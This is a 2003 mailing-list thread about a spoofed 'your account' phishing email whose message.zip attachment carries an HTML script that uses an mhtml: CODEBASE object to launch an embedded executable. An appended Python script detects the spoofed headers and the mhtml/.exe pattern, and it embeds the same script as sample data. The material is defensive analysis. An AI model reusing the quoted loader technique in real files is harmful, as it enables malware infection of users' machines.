[ale] Interesting trojan attempt?

Kevin Karst kevinkarst at yahoo.com
Sun Aug 3 17:54:11 EDT 2003



This message.zip is popular currently. It is harmful software and
there is information on the net about it.


--- "David S. Jackson" <dsj at sylvester.dsj.net> wrote:
> This forwarded message came to me from my pop account at
> Earthlink.  It has the Subject line:
> 
> Subject: [admin at sylvester.dsj.net: your account     vjovvlov]
> 
> It looked kinda clever.  I don't think I've seen this before.
> Somehow it snarfed my MX machine's name and stuck it into the
> subject line and into the To:, Reply-To:, and From: address.  I
> almost thought it was real for a second.  I shouldn't be allowing
> external queries from my internal DNS server anyway, so I'd
> better make sure that didn't happen.
> 
> The attachment was a zip file labelled: message.zip.
> 
> When I pipe the "message" to less through unzip -p, I get
> compiled binary output followed by some "launch code" in an html
> file:
> 
> <SCRIPT>
> function malware()
> {
>   // directory part of this file's own location (backslash-separated path)
>   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
>   path=unescape(path);
>   // write an OBJECT whose CODEBASE is an mhtml: URL into message.html
>   // next to this file, naming an executable stored inside it
>   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100;font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
> }
> 
> [ lots more html snipped... ]
> 
> Anyway, I guess you guys see this quite a bit, but I hadn't seen
> anything quite so personalized before.  (Also, the X-Mailer:
> attribution was kind of obvious.  And the timestamp was in PDT.)
> 
> 
> ----- Forwarded message from admin at sylvester.dsj.net -----
> 
> Received: from localhost (dsj at localhost [127.0.0.1])
> 	by sylvester.dsj.net (8.12.3/8.12.3/Debian-5) with ESMTP id h7385pXI009561
> 	for <dsj at localhost>; Sun, 3 Aug 2003 04:38:42 -0400
> Received: from pop.dsj.net [207.217.120.137]
> 	by localhost with POP3 (fetchmail-5.9.11)
> 	for dsj at localhost (single-drop); Sun, 03 Aug 2003 04:38:42 -0400 (EDT)
> Received: from localhost ([211.110.44.18])
> 	by tern (EarthLink Mail Service) with SMTP id 19Jdzq2Bj3NZFmh0
> 	for <dsj at dsj.net>; Sun, 3 Aug 2003 00:46:18 -0700 (PDT)
> From: admin at sylvester.dsj.net
> To: Dsj <dsj at dsj.net>
> Reply-To: admin at sylvester.dsj.net
> X-Mailer: The Bat! (v1.61)
> X-Priority: 2 (High)
> Subject: your account                        vjovvlov
> MIME-Version: 1.0
> Content-Type: multipart/mixed; boundary="----------5B228CBD052294B"
> Message-Id: <200308030046.19Jdzq2Bj3NZFmh0 at tern>
> Date: Sun, 3 Aug 2003 00:46:18 -0700 (PDT)
> Status: RO
> Content-Length: 29765
> Lines: 402
> 
> 
> Hello there,
> 
> I would like to inform you about important information regarding
> your email address. This email address will be expiring.
> Please read attachment for details.
> 
> ---
> Best regards, Administrator
> vjovvlov
> 
> 
> 
> ----- End forwarded message -----
> 
> 
> -- 
> David S. Jackson                        dsj at dsj.net
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> Thank goodness modern convenience is a thing of the remote future.
> 		-- Pogo, by Walt Kelly
> _______________________________________________
> Ale mailing list
> Ale at ale.org
> http://www.ale.org/mailman/listinfo/ale


_______________________________________________
Ale mailing list
Ale at ale.org
http://www.ale.org/mailman/listinfo/ale
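The two things David describes in the quoted message are mechanical to check: a From:/Reply-To: that claims his own MX host while the message actually entered EarthLink from 211.110.44.18 (the last Received: header is the first hop), and an HTML file inside message.zip whose OBJECT CODEBASE is an mhtml: URL naming an executable. The script below is an added example, not code from this thread or from anyone on the list. It embeds the forwarded headers (with the archive's "at" obfuscation written back as "@") and the quoted script as constructed test data, and builds a stand-in zip in memory instead of opening the real attachment. OWN_DOMAINS and TRUSTED_NETS are assumed values for the recipient's hosts and the networks their own mail may legitimately arrive from.

```python
import email
import io
import ipaddress
import re
import zipfile
from email import policy
from email.utils import parseaddr

# Assumed: hosts the recipient runs, and networks their own mail may
# legitimately enter from.  A From:/Reply-To: in OWN_DOMAINS arriving from
# anywhere else is the spoof described in the thread.
OWN_DOMAINS = {"dsj.net", "sylvester.dsj.net"}
TRUSTED_NETS = [ipaddress.ip_network("127.0.0.0/8"),
                ipaddress.ip_network("207.217.120.0/24")]

# Constructed sample: the forwarded headers from the post, "at" written as "@".
SAMPLE_MESSAGE = """\
Received: from localhost (dsj@localhost [127.0.0.1])
\tby sylvester.dsj.net (8.12.3/8.12.3/Debian-5) with ESMTP id h7385pXI009561
\tfor <dsj@localhost>; Sun, 3 Aug 2003 04:38:42 -0400
Received: from pop.dsj.net [207.217.120.137]
\tby localhost with POP3 (fetchmail-5.9.11)
\tfor dsj@localhost (single-drop); Sun, 03 Aug 2003 04:38:42 -0400 (EDT)
Received: from localhost ([211.110.44.18])
\tby tern (EarthLink Mail Service) with SMTP id 19Jdzq2Bj3NZFmh0
\tfor <dsj@dsj.net>; Sun, 3 Aug 2003 00:46:18 -0700 (PDT)
From: admin@sylvester.dsj.net
To: Dsj <dsj@dsj.net>
Reply-To: admin@sylvester.dsj.net
Subject: your account                        vjovvlov

"""

# Constructed sample attachment: the script quoted in the post, reflowed, as
# the message.html that sat inside message.zip.
LURE_HTML = r"""<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write('<OBJECT alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
</SCRIPT>"""

IP_IN_BRACKETS = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
# An OBJECT whose CODEBASE is an mhtml: URL, exactly what the script writes.
MHTML_CODEBASE = re.compile(r'<object\b[^>]*\bcodebase\s*=\s*"?mhtml:([^">]*)', re.I)
EXE_IN_URL = re.compile(r'file://[^"\s>]*\.exe\b', re.I)

def parse(raw):
    return email.message_from_string(raw, policy=policy.default)

def origin_ip(msg):
    """Address in the earliest Received: hop, i.e. where the message entered."""
    for hop in reversed(msg.get_all("Received") or []):  # last header = first hop
        m = IP_IN_BRACKETS.search(str(hop))
        if m:
            return m.group(1)
    return None

def sender_domain(msg, header):
    return parseaddr(str(msg.get(header, "")))[1].rpartition("@")[2].lower()

def check_headers(msg):
    """Flag From:/Reply-To: that claim our own host but entered from outside."""
    ip = origin_ip(msg)
    if ip is None:
        return ["no-origin-ip: Received chain carries no bracketed address"]
    trusted = any(ipaddress.ip_address(ip) in net for net in TRUSTED_NETS)
    findings = []
    for header in ("From", "Reply-To"):
        domain = sender_domain(msg, header)
        ours = domain in OWN_DOMAINS or domain.endswith(tuple("." + d for d in OWN_DOMAINS))
        if ours and not trusted:
            findings.append(f"spoofed-local-sender: {header} claims {domain} "
                            f"but the message entered from {ip}")
    return findings

def build_sample_zip():
    """Stand-in for message.zip: one HTML member carrying the script."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("message.html", LURE_HTML)
    return buf.getvalue()

def scan_zip(data):
    """The unzip -p | less step done mechanically, over every member."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            text = zf.read(name).decode("latin-1")
            for m in MHTML_CODEBASE.finditer(text):
                findings.append(f"mhtml-codebase-object: {name} -> {m.group(1)}")
            for m in EXE_IN_URL.finditer(text):
                findings.append(f"executable-in-url: {name} -> {m.group(0)}")
    return findings

if __name__ == "__main__":
    for finding in check_headers(parse(SAMPLE_MESSAGE)) + scan_zip(build_sample_zip()):
        print(finding)
```

Run as-is it prints four findings: both From: and Reply-To: flagged as a local sender entering from 211.110.44.18, and the message.html member flagged for the mhtml: CODEBASE and the File://foo.exe reference. On a real message, hand check_headers the raw text and scan_zip the attachment bytes. The origin check assumes the receiving MTA stamps bracketed addresses and that nothing after it rewrites the Received chain; the zip scan only reads members into memory, so a nested archive or a pure binary member simply produces no findings rather than being expanded.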




